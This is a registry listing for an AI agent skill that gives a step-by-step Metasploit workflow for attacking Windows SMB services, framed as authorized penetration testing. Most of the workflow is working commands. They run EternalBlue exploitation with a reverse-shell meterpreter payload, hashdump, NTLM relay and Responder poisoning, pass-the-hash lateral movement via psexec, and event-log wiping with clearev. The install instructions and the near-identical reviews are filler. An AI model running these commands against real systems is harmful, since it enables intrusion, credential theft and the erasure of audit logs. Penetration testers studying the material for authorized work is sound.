explainx.ainewsletter3.4k
exploiting-smb-vulnerabilities-with-metasploit

exploiting-smb-vulnerabilities-with-metasploit

mukul975/Anthropic-Cybersecurity-Skills · updated May 25, 2026

MDX-style export adds YAML metadata + attribution linking explainx.ai and this canonical listing URL.

$npx skills install mukul975/Anthropic-Cybersecurity-Skills/exploiting-smb-vulnerabilities-with-metasploit
0 commentsdiscussion
summary

Identifies and exploits SMB protocol vulnerabilities using Metasploit Framework during authorized penetration tests to demonstrate risks from unpatched Windows systems, misconfigured shares, and weak authentication in enterprise networks.

skill.md
name
exploiting-smb-vulnerabilities-with-metasploit
description
'Identifies and exploits SMB protocol vulnerabilities using Metasploit Framework during authorized penetration tests to demonstrate risks from unpatched Windows systems, misconfigured shares, and weak authentication in enterprise networks. '
domain
cybersecurity
subdomain
network-security
tags
- network-security - smb - metasploit - exploitation - eternalblue
version
'1.0'
author
mahipal
license
Apache-2.0
nist_csf
- PR.IR-01 - DE.CM-01 - ID.AM-03 - PR.DS-02

Exploiting SMB Vulnerabilities with Metasploit

When to Use

  • Testing Windows systems for critical SMB vulnerabilities (EternalBlue, EternalRomance, PrintNightmare) during authorized penetration tests
  • Demonstrating lateral movement risks via SMB relay, pass-the-hash, and credential spraying
  • Validating that patch management processes have addressed known SMB vulnerabilities
  • Assessing SMB signing enforcement and share permission configurations across the domain
  • Testing network segmentation by attempting SMB exploitation across VLAN boundaries

Do not use against systems without explicit written authorization, against production domain controllers without a maintenance window, or to deploy persistent backdoors beyond the scope of the assessment.

Prerequisites

  • Metasploit Framework 6.x installed (msfconsole --version)
  • Authorized penetration test scope document listing target IP ranges and approved attack types
  • Network access to target SMB services (TCP 445, TCP 139)
  • CrackMapExec and Impacket tools installed for complementary SMB testing
  • Valid test credentials or credential wordlists approved for the engagement
  • Kali Linux or equivalent testing platform

Workflow

Step 1: Enumerate SMB Services and Versions

# Discover hosts with SMB open using Nmap
nmap -sS -p 445,139 --open -oA smb_hosts 10.10.0.0/24

# Enumerate SMB versions and OS information
nmap -sV -p 445 --script smb-os-discovery,smb-protocols -oA smb_enum 10.10.0.0/24

# Use CrackMapExec for rapid SMB enumeration
crackmapexec smb 10.10.0.0/24 --gen-relay-list smb_nosigning.txt

# Check SMB signing status (disabled = vulnerable to relay)
crackmapexec smb 10.10.0.0/24 --smb-signing

# Enumerate shares with null session
crackmapexec smb 10.10.0.0/24 -u '' -p '' --shares

Step 2: Scan for Known SMB Vulnerabilities

# Start Metasploit and scan for MS17-010 (EternalBlue)
msfconsole -q
msf6> use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(smb_ms17_010)> set RHOSTS file:smb_hosts.txt
msf6 auxiliary(smb_ms17_010)> set THREADS 10
msf6 auxiliary(smb_ms17_010)> run

# Scan for MS08-067 (Conficker vulnerability)
msf6> use auxiliary/scanner/smb/ms08_067_check
msf6 auxiliary(ms08_067_check)> set RHOSTS file:smb_hosts.txt
msf6 auxiliary(ms08_067_check)> run

# Check for SMBGhost (CVE-2020-0796)
nmap -p 445 --script smb-vuln-cve-2020-0796 10.10.0.0/24

# Check for PrintNightmare (CVE-2021-34527)
crackmapexec smb 10.10.0.0/24 -u testuser -p 'TestPass123' -M printnightmare

Step 3: Exploit EternalBlue (MS17-010)

msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue)> set RHOSTS 10.10.5.23
msf6 exploit(ms17_010_eternalblue)> set LHOST 10.10.1.99
msf6 exploit(ms17_010_eternalblue)> set LPORT 4444
msf6 exploit(ms17_010_eternalblue)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(ms17_010_eternalblue)> set MaxExploitAttempts 3
msf6 exploit(ms17_010_eternalblue)> exploit

# Post-exploitation -- verify access level
meterpreter> getuid
# Server username: NT AUTHORITY\SYSTEM

meterpreter> sysinfo
meterpreter> ipconfig
meterpreter> hashdump

Step 4: Perform SMB Relay Attack

# Identify hosts without SMB signing (from Step 1)
# Set up NTLM relay with Impacket
sudo impacket-ntlmrelayx -tf smb_nosigning.txt -smb2support -i

# Trigger authentication from a compromised host or via phishing
# From Meterpreter session on a compromised host:
meterpreter> shell
C:\> net use \\10.10.1.99\share /user:DOMAIN\admin password

# Or use Metasploit's SMB relay module
msf6> use exploit/windows/smb/smb_relay
msf6 exploit(smb_relay)> set SMBHOST 10.10.5.30
msf6 exploit(smb_relay)> set LHOST 10.10.1.99
msf6 exploit(smb_relay)> exploit

# Use responder to capture NTLM hashes for offline cracking
sudo responder -I eth0 -wrfv

Step 5: Pass-the-Hash and Lateral Movement via SMB

# Extract hashes from compromised system
meterpreter> hashdump
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::

# Use pass-the-hash with CrackMapExec
crackmapexec smb 10.10.0.0/24 -u Administrator \
  -H e19ccf75ee54e06b06a5907af13cef42 --shares

# Execute commands via pass-the-hash
crackmapexec smb 10.10.5.30 -u Administrator \
  -H e19ccf75ee54e06b06a5907af13cef42 -x "whoami && hostname"

# Use Impacket psexec for interactive shell
impacket-psexec [email protected] \
  -hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42

# Use Metasploit psexec module
msf6> use exploit/windows/smb/psexec
msf6 exploit(psexec)> set RHOSTS 10.10.5.30
msf6 exploit(psexec)> set SMBUser Administrator
msf6 exploit(psexec)> set SMBPass aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
msf6 exploit(psexec)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(psexec)> set LHOST 10.10.1.99
msf6 exploit(psexec)> exploit

Step 6: Document Findings and Clean Up

# Document all compromised systems and access levels
# In Meterpreter, screenshot desktops for evidence
meterpreter> screenshot

# List accessible shares and sensitive data
meterpreter> shell
C:\> net share
C:\> dir \\10.10.5.30\C$\Users\ /s /b

# Clean up -- remove any artifacts
meterpreter> clearev
meterpreter> shell
C:\> del /f C:\Windows\Temp\payload.exe

# Close all sessions
msf6> sessions -K

# Verify cleanup
crackmapexec smb 10.10.5.23 -u Administrator -H <hash> -x "dir C:\Windows\Temp\payload*"

Key Concepts

TermDefinition
EternalBlue (MS17-010)Critical SMB vulnerability in SMBv1 allowing remote code execution as SYSTEM without authentication, originally developed by the NSA and leaked by Shadow Brokers
SMB SigningCryptographic signing of SMB packets to prevent tampering and relay attacks; when disabled, attackers can relay NTLM authentication to other SMB hosts
Pass-the-HashAuthentication technique using captured NTLM password hashes directly instead of plaintext passwords, bypassing the need to crack the hash
NTLM RelayAttack where captured NTLM authentication is forwarded to a different server in real-time, granting the attacker access as the relayed user
PsExecRemote execution technique that uploads a service binary to the ADMIN$ share and creates a Windows service to execute commands as SYSTEM
Null SessionAnonymous SMB connection (empty username and password) that may expose share listings, user enumeration, and policy information on misconfigured systems

Tools & Systems

  • Metasploit Framework: Exploitation framework with dedicated SMB scanner, exploit, and post-exploitation modules for comprehensive SMB testing
  • CrackMapExec: Swiss-army knife for SMB enumeration, credential testing, share enumeration, and command execution across Windows networks
  • Impacket: Python library providing psexec, smbclient, ntlmrelayx, and other tools for low-level SMB protocol interaction
  • Responder: LLMNR/NBT-NS/mDNS poisoner that captures NTLM hashes from Windows name resolution fallback behavior
  • enum4linux-ng: Updated SMB enumeration tool for extracting users, groups, shares, and policies from Windows/Samba hosts

Common Scenarios

Scenario: Internal Penetration Test Targeting Windows Domain via SMB

Context: During an internal penetration test for a financial services firm, the tester has network access to the corporate VLAN (10.10.0.0/16). The scope includes testing all Windows servers and workstations for SMB-related vulnerabilities. Active Directory domain is CORP.EXAMPLE.COM with approximately 200 hosts.

Approach:

  1. Scan the entire /16 for open SMB ports and enumerate OS versions with CrackMapExec
  2. Identify 12 hosts running Windows Server 2012 R2 without MS17-010 patch applied
  3. Exploit EternalBlue on a non-critical file server (10.10.5.23) to gain SYSTEM access
  4. Extract local administrator password hash using hashdump and discover password reuse across 47 hosts
  5. Use pass-the-hash to access a domain controller, extracting the NTDS.dit database
  6. Demonstrate that SMB signing is disabled on 83% of hosts, enabling relay attacks
  7. Document the complete attack chain showing how one unpatched system led to full domain compromise

Pitfalls:

  • EternalBlue exploit can cause a blue screen of death (BSOD) on the target, especially on older or unstable systems
  • Running psexec on heavily monitored endpoints may trigger EDR alerts and burn the engagement
  • Performing hashdump on domain controllers with large databases can cause performance degradation
  • Not checking for SMBv1 explicitly -- some scanners may miss it if SMBv2/v3 is also available

Output Format

## SMB Vulnerability Assessment Report

**Engagement**: Internal Penetration Test
**Target Range**: 10.10.0.0/16 (CORP.EXAMPLE.COM)
**SMB Hosts Discovered**: 187

### Critical Findings

**Finding 1: MS17-010 (EternalBlue) - 12 Unpatched Hosts**
- Severity: Critical (CVSS 9.8)
- Affected: 10.10.5.23, 10.10.5.24, 10.10.8.10 (+ 9 others)
- Impact: Remote code execution as SYSTEM without authentication
- Exploited: Yes - gained SYSTEM on 10.10.5.23
- Remediation: Apply MS17-010 patch, disable SMBv1

**Finding 2: SMB Signing Disabled - 155/187 Hosts**
- Severity: High (CVSS 7.5)
- Impact: NTLM relay attacks allow credential forwarding
- Exploited: Yes - relayed domain admin credentials
- Remediation: Enable SMB signing via Group Policy

**Finding 3: Local Admin Password Reuse - 47 Hosts**
- Severity: High (CVSS 7.2)
- Impact: Compromise of one host enables lateral movement to 47 systems
- Remediation: Deploy LAPS (Local Administrator Password Solution)
how to use exploiting-smb-vulnerabilities-with-metasploit

How to use exploiting-smb-vulnerabilities-with-metasploit on Cursor

AI-first code editor with Composer

1

Prerequisites

Before installing skills in Cursor, ensure your development environment meets these requirements:

  • Cursor installed and configured on your development machine
  • Node.js version 16.0+ with npm package manager (verify with node --version)
  • Active project directory or workspace where you want to add exploiting-smb-vulnerabilities-with-metasploit
2

Execute installation command

Execute the skills CLI command in your project's root directory to begin installation:

$npx skills install mukul975/Anthropic-Cybersecurity-Skills/exploiting-smb-vulnerabilities-with-metasploit

The skills CLI fetches exploiting-smb-vulnerabilities-with-metasploit from GitHub repository mukul975/Anthropic-Cybersecurity-Skills and configures it for Cursor.

3

Select Cursor when prompted

The CLI will show a list of available agents. Use arrow keys to navigate and space to select Cursor:

◆ Which agents do you want to install to?
│ ── Universal (.agents/skills) ── always included ────
│ • Amp
│ • Antigravity
│ • Cline
│ • Codex
│ ●Cursor(selected)
│ • Cursor
│ • Windsurf
4

Verify installation

Confirm successful installation by checking the skill directory location:

.cursor/skills/exploiting-smb-vulnerabilities-with-metasploit

Reload or restart Cursor to activate exploiting-smb-vulnerabilities-with-metasploit. Access the skill through slash commands (e.g., /exploiting-smb-vulnerabilities-with-metasploit) or your agent's skill management interface.

Security & Verification Notice

We perform automated surface-level scans (Gen AI Scanner, Socket, Snyk) during installation. These checks detect common vulnerabilities but do not guarantee complete security. Always review skill source code and verify the publisher's reputation before production use.

Skills execute code in your development environment. Always verify the publisher's identity, review recent commits, and test in isolated environments before production deployment.

Additional Resources

View source code on GitHubSkills CLI documentationLearn more about CursorWhat are agent skills?

List & Monetize Your Skill

Submit your Claude Code skill and start earning

GET_STARTED →

Use Cases

Task Automation & Efficiency

Automate repetitive workflows and reduce manual effort

Example

Generate reports, summarize documents, draft communications

Save 3-5 hours per week on routine tasks

Knowledge Enhancement

Learn new skills, understand complex topics, get expert guidance

Example

Explain concepts, provide examples, suggest learning resources

Accelerate learning and skill development by 2x

Quality Improvement

Enhance output quality through reviews, suggestions, and refinements

Example

Review drafts, suggest improvements, catch errors

Improve work quality by 30-40% with less effort

Implementation Guide

Prerequisites

  • Claude Desktop or compatible AI client with skill support
  • Clear understanding of task or problem to solve
  • Willingness to iterate and refine outputs

Time Estimate

15-45 minutes depending on use case complexity

Installation Steps

  1. 1.Install skill using provided installation command
  2. 2.Test with simple use case relevant to your work
  3. 3.Evaluate output quality and relevance
  4. 4.Iterate on prompts to improve results
  5. 5.Integrate into regular workflow if valuable

Common Pitfalls

  • Expecting perfect results without iteration
  • Not providing enough context in prompts
  • Using skill for tasks outside its intended scope
  • Accepting outputs without review and validation

Best Practices

✓ Do

  • +Start with clear, specific prompts
  • +Provide relevant context and constraints
  • +Review and refine all outputs before using
  • +Iterate to improve output quality
  • +Document successful prompt patterns

✗ Don't

  • Don't use without understanding skill limitations
  • Don't skip validation of outputs
  • Don't share sensitive information in prompts
  • Don't expect skill to replace human judgment

💡 Pro Tips

  • Be specific about desired format and style
  • Ask for multiple options to choose from
  • Request explanations to understand reasoning
  • Combine AI efficiency with human expertise

When to Use This

✓ Use When

Use when skill capabilities match your task, clear ROI on time saved, and you can validate outputs. Best for repetitive tasks, learning, and quality improvement.

✗ Avoid When

Avoid when task requires deep expertise you can't validate, involves sensitive decisions, or when learning process is more valuable than speed of completion.

Learning Path

  1. 1Familiarize yourself with skill capabilities and limitations
  2. 2Start with low-risk, non-critical tasks
  3. 3Progress to more complex and valuable use cases
  4. 4Build expertise through regular use and experimentation

Discussion

Product Hunt–style comments (not star reviews)
  • No comments yet — start the thread.
general reviews

Ratings

4.774 reviews
  • Ganesh Mohane· Dec 28, 2024

    Useful defaults in exploiting-smb-vulnerabilities-with-metasploit — fewer surprises than typical one-off scripts, and it plays nicely with `npx skills` flows.

  • Arjun Mehta· Dec 28, 2024

    We added exploiting-smb-vulnerabilities-with-metasploit from the explainx registry; install was straightforward and the SKILL.md answered most questions upfront.

  • Arjun Khanna· Dec 24, 2024

    We added exploiting-smb-vulnerabilities-with-metasploit from the explainx registry; install was straightforward and the SKILL.md answered most questions upfront.

  • Henry Bhatia· Dec 12, 2024

    exploiting-smb-vulnerabilities-with-metasploit fits our agent workflows well — practical, well scoped, and easy to wire into existing repos.

  • Noah Agarwal· Dec 12, 2024

    Useful defaults in exploiting-smb-vulnerabilities-with-metasploit — fewer surprises than typical one-off scripts, and it plays nicely with `npx skills` flows.

  • Shikha Mishra· Dec 8, 2024

    Solid pick for teams standardizing on skills: exploiting-smb-vulnerabilities-with-metasploit is focused, and the summary matches what you get after install.

  • Arjun Perez· Dec 8, 2024

    Registry listing for exploiting-smb-vulnerabilities-with-metasploit matched our evaluation — installs cleanly and behaves as described in the markdown.

  • Anaya Yang· Dec 4, 2024

    Solid pick for teams standardizing on skills: exploiting-smb-vulnerabilities-with-metasploit is focused, and the summary matches what you get after install.

  • Anika Johnson· Nov 27, 2024

    exploiting-smb-vulnerabilities-with-metasploit fits our agent workflows well — practical, well scoped, and easy to wire into existing repos.

  • Sakshi Patil· Nov 19, 2024

    exploiting-smb-vulnerabilities-with-metasploit is among the better-maintained entries we tried; worth keeping pinned for repeat workflows.

showing 1-10 of 74

1 / 8